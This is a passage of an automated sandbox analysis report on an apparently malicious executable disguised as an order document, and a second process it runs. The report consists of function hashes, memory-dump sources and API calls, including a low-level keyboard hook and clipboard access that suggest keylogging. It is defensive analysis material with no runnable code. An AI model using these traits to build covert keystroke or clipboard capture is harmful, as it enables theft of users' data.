Opcode ID: e9db6e42266ddeac6db391d3a14e311506ce49aa74d915155d9a30100865050e
Instruction ID: ce5db5665656138a3eb1a354701e091d09b869a2cb71ec41e5c308df00943f8f
Opcode Fuzzy Hash: e9db6e42266ddeac6db391d3a14e311506ce49aa74d915155d9a30100865050e
Instruction Fuzzy Hash: CA41E6B0E0460ADFDF04CFAAD4815EEFBF2BF89214F14C56AC515A7254D7349A428F94

Uniqueness

Uniqueness Score: -1.00%

Function 079938C0 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

!JC, xrefs: 079939B0

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: !JC
API String ID: 0-2464361168
Opcode ID: fdb01b9930f897f9f496b6ee0fa6ffde92a2322e4dc4bdfaa15550ca3aa9beb0
Instruction ID: f85b91d1778a8e6d25e502f1d996cfe39ea22ab9a83ec77db9c97c094c4b68d4
Opcode Fuzzy Hash: fdb01b9930f897f9f496b6ee0fa6ffde92a2322e4dc4bdfaa15550ca3aa9beb0
Instruction Fuzzy Hash: 8A41E6B0E0560ADBDF04CFAAC5816AEFBF2BF89204F14C56AC415B7214D7749A528F94

Uniqueness

Uniqueness Score: -1.00%

Function 07982348 Relevance: .8, Instructions: 832COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 622119fa1e3cabf8a5b9b59d20d8cd4654684af50ab4ca73d8eb32811f50868e
Instruction ID: 6b30a6b1880eb048928989fc159f1a46d95129c10f4d45e8627d8339fa90e0cf
Opcode Fuzzy Hash: 622119fa1e3cabf8a5b9b59d20d8cd4654684af50ab4ca73d8eb32811f50868e
Instruction Fuzzy Hash: 4C626CB4E0021ACFCB50EFA8C984AADBBF1FF89304F1585A9D449AB255D730AD91CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07997D50 Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b3a401327f665d093aa88b5360942935ce89958cc0dbda48e6f9f4e344a95a9
Instruction ID: efb5ad195d7ddbbc2091ac7564b792b6b2578f655b218c0ca3b542b0fc78f17e
Opcode Fuzzy Hash: 3b3a401327f665d093aa88b5360942935ce89958cc0dbda48e6f9f4e344a95a9
Instruction Fuzzy Hash: 64F14AB4E142199FDB14DFA9CA809AEFBB2FF8A314F248569D408AB315D7309D41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07997E1E Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b8785b3b6978b86e4f796a3a81b6541bf1d36f23843cfaf043edf0eb539939c
Instruction ID: 6c6368409f91d16239aaddf2614ce5d30f4875a5a7c0512eabf59f08c23c1e71
Opcode Fuzzy Hash: 7b8785b3b6978b86e4f796a3a81b6541bf1d36f23843cfaf043edf0eb539939c
Instruction Fuzzy Hash: 57E15CB4E152199FDB14DF98C9809ADFBB2FF8A318F248569D404A7319D7309D41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0160E880 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65993d8ff092b035dad869a8da74c05f8540e262a0020c97da6c69cf3ff5bd99
Instruction ID: 4829348c89058ff4c02874f891e16597aa682e3f9db8186b27f1673636eb457f
Opcode Fuzzy Hash: 65993d8ff092b035dad869a8da74c05f8540e262a0020c97da6c69cf3ff5bd99
Instruction Fuzzy Hash: 8912C7F14237668BE330CF65E8985893B71B74532AB924209D2721FAD8E7F4114EEF46

Uniqueness

Uniqueness Score: -1.00%

Function 0160BFF4 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94de682f4f3cc6c34e421695c8bc624ff0767cdc1dd043df72dbd20e8a1f4ad1
Instruction ID: 1e043b819dbe0d3c57c95a743dc630acfd4c28b0fa0115e0df8b8c1dd66ed31d
Opcode Fuzzy Hash: 94de682f4f3cc6c34e421695c8bc624ff0767cdc1dd043df72dbd20e8a1f4ad1
Instruction Fuzzy Hash: BCA1AF36E0021ACFCF1ADFB5C8445DEBBB2FF85300B15856AE905AB2A1DB31A955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0160E87F Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e91534d076add1b76dc34b13d3f5b68119a0d1afe6c87c9891181541673cee0
Instruction ID: 1f4c92c3a6f57505ab538f88611497343b2770bece7f93a2f5bb92d1ada52155
Opcode Fuzzy Hash: 7e91534d076add1b76dc34b13d3f5b68119a0d1afe6c87c9891181541673cee0
Instruction Fuzzy Hash: 4DC12CB14237668AE730CF65E8981893B71BB8532AF524218D1716FAD8F7F4104EEF45

Uniqueness

Uniqueness Score: -1.00%

Function 07994A69 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 068f4b7986418a1c4415f8b6e74a88ecc59864c4ab1e89fed4c6a333c17224c1
Instruction ID: 239532839d3c700a1c598263e47430662cb82b690d6bfebfff64ba62f449ec46
Opcode Fuzzy Hash: 068f4b7986418a1c4415f8b6e74a88ecc59864c4ab1e89fed4c6a333c17224c1
Instruction Fuzzy Hash: 79518E71D056588BDB29DF6BCD4478AFBF3AFC8200F14C1BA840CA6265DB340A858F51

Uniqueness

Uniqueness Score: -1.00%

Function 07994A80 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfaa10c381bc9f4f856afe5ff56b15bd8f4c5c6b4d149c44017063e8ee7e9460
Instruction ID: 6abd6033794a8f3f87c687cd0fad7a805f4f9f8c6dd61b29118f32406acaa3dd
Opcode Fuzzy Hash: dfaa10c381bc9f4f856afe5ff56b15bd8f4c5c6b4d149c44017063e8ee7e9460
Instruction Fuzzy Hash: 7D514DB1E056188BEB68DF6BDD4579EFAF3AFC8201F14C1B9950CA6214DB301A858F51

Uniqueness

Uniqueness Score: -1.00%

Function 0799A2B7 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a75331a5fe92f49c5dca6367e51acd61071700d605bdc6c03a75996c8f5b8a
Instruction ID: 055d67b71c4428bd42ead4a05fb4816e31a39b9555f0f7308440ca38cc18f6a6
Opcode Fuzzy Hash: 20a75331a5fe92f49c5dca6367e51acd61071700d605bdc6c03a75996c8f5b8a
Instruction Fuzzy Hash: 32217971E162598BDB18CFABD9002DEFBF7AFC9210F14C16AD408A7254DB344A41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0798ED18 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 864dedd3a84b2179fba3b66ba551e7f9ca7f3f597866a1cb887c6c25d981f642
Instruction ID: 1c5c5f6d93b520ebc395a3614be18f9aee158803eacce4f2f75af44fac7f3dc8
Opcode Fuzzy Hash: 864dedd3a84b2179fba3b66ba551e7f9ca7f3f597866a1cb887c6c25d981f642
Instruction Fuzzy Hash: B3210EB1E046189BEB5CCFABD80069EFBF7AFC9200F08C07AD808A6254EB3445458F51

Uniqueness

Uniqueness Score: -1.00%

Function 0799A2C8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9e04980165ad9c760274d07591e089cff7adc241dec6a873f4e04eb8c252e45
Instruction ID: 5668c1a47bfbbed72c303adb3ef6bc66cfbac03f259a329d7130362cbda27bea
Opcode Fuzzy Hash: f9e04980165ad9c760274d07591e089cff7adc241dec6a873f4e04eb8c252e45
Instruction Fuzzy Hash: E6210471E116198BEB18CFABD94169EFBF7EBC9210F14C13AD518A7254DB344A01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 07993F40 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64db007f3911a4c5cf9638c7267bf758f94c5f4d205c5cace4db03d57db96915
Instruction ID: b551e1d74bfea850658d7f7303d87d18c79a150c76b7c7faf9ec8f57e36916d9
Opcode Fuzzy Hash: 64db007f3911a4c5cf9638c7267bf758f94c5f4d205c5cace4db03d57db96915
Instruction Fuzzy Hash: E111EFB1E106189BEB18CFABD94569EFAF3AFC8304F04C17AC818B6264EB3405468F51

Uniqueness

Uniqueness Score: -1.00%

Function 07985388 Relevance: 5.1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

Strings

KOl, xrefs: 07985399
KOl, xrefs: 079853D9
KOl, xrefs: 079853A5
KOl, xrefs: 079853E5

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: KOl$KOl$KOl$KOl
API String ID: 0-3463482722
Opcode ID: 4c755caaaab85ca9cb080053090981a982e0416353eeb47eaa4d7dbaf55c4761
Instruction ID: 21e78f6313de836de628a65fe54134b103d0797092b8c1175713fe34777f7de8
Opcode Fuzzy Hash: 4c755caaaab85ca9cb080053090981a982e0416353eeb47eaa4d7dbaf55c4761
Instruction Fuzzy Hash: 7011A0B43002118FC384EA7AE194A2ABAD9AF89288755447DE11ACF761DF62DC0A8751

Uniqueness

Uniqueness Score: -1.00%

Function 079858C8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

Jl, xrefs: 079858D4
Jl, xrefs: 07985906
Jl, xrefs: 079858FA
Jl, xrefs: 079858DE

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: Jl$Jl$Jl$Jl
API String ID: 0-447794488
Opcode ID: a7d08ccbbe1f5d8b9b9b3f23b6acc48b4d27f73f23ae230a5e43004f66318b99
Instruction ID: 7ce29c528facfd3272d447751b5c8d1016d1d3b0d5aa4a3287b96b9d6292db14
Opcode Fuzzy Hash: a7d08ccbbe1f5d8b9b9b3f23b6acc48b4d27f73f23ae230a5e43004f66318b99
Instruction Fuzzy Hash: FA01D8B17200118FCBA4EA6DC450E2A73E9AF96778757406AE401CF374DA72DC56C790

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ORDER (6256 OS)#391 PI.exePID: 1948, Parent PID: 1688COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.6%
Total number of Nodes:	183
Total number of Limit Nodes:	9

Executed Functions

Function 06CA3790 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 06CA4243

Memory Dump Source

Source File: 00000004.00000002.580501836.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ca0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 075eaf96ec18522619bc4443b07c2c2d21d766aa077bb58923d599c6933c3bf7
Instruction ID: cbd5b32fa0abe17a84f3857c1d83b2d4fc484e16ca622ce46fe31487f9bf7dd5
Opcode Fuzzy Hash: 075eaf96ec18522619bc4443b07c2c2d21d766aa077bb58923d599c6933c3bf7
Instruction Fuzzy Hash: E82129B5D002099FCB54CF9AD848BEEFBF5FB88314F148429E455A7650C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0120CE44 Relevance: 1.6, APIs: 1, Instructions: 91
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0120CF1A

Memory Dump Source

Source File: 00000004.00000002.564981149.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1200000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: efc76ec783ba91efb2c15576b3c3f7039161bcef731fb4b500ee835efc7d754f
Instruction ID: 5792c7e127a9a50abfe59b364174bfa9e243658eb3b0041098dfdf21bba43afe
Opcode Fuzzy Hash: efc76ec783ba91efb2c15576b3c3f7039161bcef731fb4b500ee835efc7d754f
Instruction Fuzzy Hash: B13137B0D202498FDB15CFA8C485B9EBFB1FB08314F14866EE915E7281D7749845CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0120B27C Relevance: 1.6, APIs: 1, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0120CF1A

Memory Dump Source

Source File: 00000004.00000002.564981149.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1200000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bdc043138322c486b4bbd04251ddbc7a0074e7ac4a9611b07c9f1d130fedf0fd
Instruction ID: afaa92a895e3d1fd5a111d20941abc30a398c3d3370f6f844d5e2238e202807d
Opcode Fuzzy Hash: bdc043138322c486b4bbd04251ddbc7a0074e7ac4a9611b07c9f1d130fedf0fd
Instruction Fuzzy Hash: 353133B0D202498FDB15CFA8C88979EBBB1AB08314F14866AE915A7281D774A845CF96

Uniqueness

Uniqueness Score: -1.00%

Function 06CA1E04 Relevance: 1.6, APIs: 1, Instructions: 76
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06CA1E98

Memory Dump Source

Source File: 00000004.00000002.580501836.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ca0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 27f42dc0a7e69249ae913c457943238430c7011ced9ddf6c259428546376480b
Instruction ID: 5adf016a358d1d475a76753ce86d69dca82039c97a0b24339dbf23d5dba03b5d
Opcode Fuzzy Hash: 27f42dc0a7e69249ae913c457943238430c7011ced9ddf6c259428546376480b
Instruction Fuzzy Hash: 9031F0B0D003499FDB64CF99C988BCEBBF5AF48318F188419E504ABA90D774A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06CA1E10 Relevance: 1.6, APIs: 1, Instructions: 71
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06CA1E98

Memory Dump Source

Source File: 00000004.00000002.580501836.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ca0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 79eaad727b4a749ba97f58501d3ecfbece65c683aa19056060940eac62d7d62a
Instruction ID: a6359f3e539e9083bd348d3a04553ca580d26c048c3d0a33daf201e8349bafaf
Opcode Fuzzy Hash: 79eaad727b4a749ba97f58501d3ecfbece65c683aa19056060940eac62d7d62a
Instruction Fuzzy Hash: 7031E0B0D002499FDB64CF99C988BCEBBF5AF48318F288419E404AB690D7746945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012051C9 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000), ref: 012052A2

Memory Dump Source

Source File: 00000004.00000002.564981149.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1200000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 282eefb0e131bcdf55d578b8d0c924d8886fbc838c8bad190647fe7f4b8f9267
Instruction ID: cb7e78e7027af24bbcb65d8660060f50317c3a5af8380b3865da312e2048a435
Opcode Fuzzy Hash: 282eefb0e131bcdf55d578b8d0c924d8886fbc838c8bad190647fe7f4b8f9267
Instruction Fuzzy Hash: BB2146709243468FEB11EFA8D5497AEBBF0FB45318F548529E508A7A82CB796804CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06CA41C1 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 06CA4243

Memory Dump Source

Source File: 00000004.00000002.580501836.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ca0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: e850f94e74a4d4b0a236bf4e46c4e54dcfe1f567a742aa7d5e6d7dcc07a15f74
Instruction ID: 0252f4c5424ec3f38e860eed1349e4c3c775c96d47eb8161af4065211c189642
Opcode Fuzzy Hash: e850f94e74a4d4b0a236bf4e46c4e54dcfe1f567a742aa7d5e6d7dcc07a15f74
Instruction Fuzzy Hash: 622135B5D002098FCB54CF99C848BDEBBF5FB88314F14841AE469A7650CB74A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01205218 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000), ref: 012052A2

Memory Dump Source

Source File: 00000004.00000002.564981149.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1200000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 4b2a9a38822e4056677f9488666015bee77321c261f976581b41196d37b8547b
Instruction ID: 6e70c4112e8c64279384b471c86067d38fb98d808c42fc318db9982a957e62a7
Opcode Fuzzy Hash: 4b2a9a38822e4056677f9488666015bee77321c261f976581b41196d37b8547b
Instruction Fuzzy Hash: B82158B091134A8FEF50DFA9C80979EBFF4EB49324F148529E405A3682DB786904CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CAC330 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?), ref: 06CAD7AA

Memory Dump Source

Source File: 00000004.00000002.580501836.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ca0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c71f7eccbe806dce65f8e91cb4b2ac6640648daa9b47c4881c9f685f1d9a0fb7
Instruction ID: c0fbf03e9bba070b849a230f67e0e16016c9c8938b24bf468145651e4f1c0a48
Opcode Fuzzy Hash: c71f7eccbe806dce65f8e91cb4b2ac6640648daa9b47c4881c9f685f1d9a0fb7
Instruction Fuzzy Hash: 571106B6D003099FDB14CF9AD448BDEBBF4EB88314F14842ED416A7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06CAD738 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?), ref: 06CAD7AA

Memory Dump Source

Source File: 00000004.00000002.580501836.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ca0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e2935bfd981ed4291dd26f5037ad9d364d8acc3db10e80d7596867f5aeb3ddf4
Instruction ID: f610acb111d5d4fa856909c75948dbffb66b42d424904ec99cfa0b3cb4d8ec2c
Opcode Fuzzy Hash: e2935bfd981ed4291dd26f5037ad9d364d8acc3db10e80d7596867f5aeb3ddf4
Instruction Fuzzy Hash: 1C1106B6D002099FDB10CF9AD844BDEBBF4EB48354F14842ED415A7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01205228 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 012052A2

Memory Dump Source

Source File: 00000004.00000002.564981149.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1200000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 70cddc014a615374626cd5e9a817dc206718ddc5958bd14970fcb19e71d9f36d
Instruction ID: a62f75e05afcf1a754433ad3c73cb5fc8d946c8e4d7e0b222efb6f6c4d80dd37
Opcode Fuzzy Hash: 70cddc014a615374626cd5e9a817dc206718ddc5958bd14970fcb19e71d9f36d
Instruction Fuzzy Hash: AA1156B091134ACFEB50DFA9C40879EBFF4FB49324F148529E405A3A81CB786944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CA1B01 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 06CA1B5D

Memory Dump Source

Source File: 00000004.00000002.580501836.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ca0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f0ec811079e5977d719d640a86fa2085ab23a384cffc0e74088008126083f5b3
Instruction ID: 1696a818f4f479aebccb08ce65d4a90f5bc3b937608d92c280aa52f571220d16
Opcode Fuzzy Hash: f0ec811079e5977d719d640a86fa2085ab23a384cffc0e74088008126083f5b3
Instruction Fuzzy Hash: 8B1100B59002498FCB10CFAAD849BCEBBF4EB58324F14841AE519A7700D379A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06CA1B08 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 06CA1B5D

Memory Dump Source

Source File: 00000004.00000002.580501836.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ca0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ce7618bf5fb9b3ebf0f89eac10322d93271e529bd4e0e754d3a9056bdeb58101
Instruction ID: 12260addc93b26948812eb1fab93105e3c169f53cb9ef4c9147e6a2e8ee8f545
Opcode Fuzzy Hash: ce7618bf5fb9b3ebf0f89eac10322d93271e529bd4e0e754d3a9056bdeb58101
Instruction Fuzzy Hash: F411E2B59003498FCB10DF9AD449BDEBBF4EB48324F14851AD519A7700D379A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WsdnBq.exePID: 6004, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	84
Total number of Limit Nodes:	6

Executed Functions

Function 0E820B88 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.420757730.000000000E820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e820000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e6414bb3982540ba102ac6e20a101844e4f5361d483aba6fa8dbe8640823e0
Instruction ID: db54119d924d96dbe2af65ed039926f273110f2d53fe49c2359634cf53a5efbf
Opcode Fuzzy Hash: 37e6414bb3982540ba102ac6e20a101844e4f5361d483aba6fa8dbe8640823e0
Instruction Fuzzy Hash: 0621AF71D452288EDB248BA4D828BFEBBF0EB49315F14947AD441B7281CB358984CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0E820B98 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.420757730.000000000E820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e820000_WsdnBq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da4d31051fb081569fb242cdc83c35def51bca022bcc08473f267a3b738e2673
Instruction ID: fa1bc8054b6840c2be7a8b004894694feae08cfce8dcc9ed497c361a83cd61ab
Opcode Fuzzy Hash: da4d31051fb081569fb242cdc83c35def51bca022bcc08473f267a3b738e2673
Instruction Fuzzy Hash: 2D117C70D052288FCB24CFA5D428BEEBBF1BB4E315F14907AD041B3280C7398A84CB68

Uniqueness

Uniqueness Score: -1.00%

Function 02C0BAC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 123
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02C0BB30
GetCurrentThread.KERNEL32 ref: 02C0BB6D
GetCurrentProcess.KERNEL32 ref: 02C0BBAA
GetCurrentThreadId.KERNEL32 ref: 02C0BC03

Strings

hv, xrefs: 02C0BC2F

Memory Dump Source

Source File: 00000005.00000002.398151170.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c00000_WsdnBq.jbxd

Similarity

API ID: Current$ProcessThread
String ID: hv
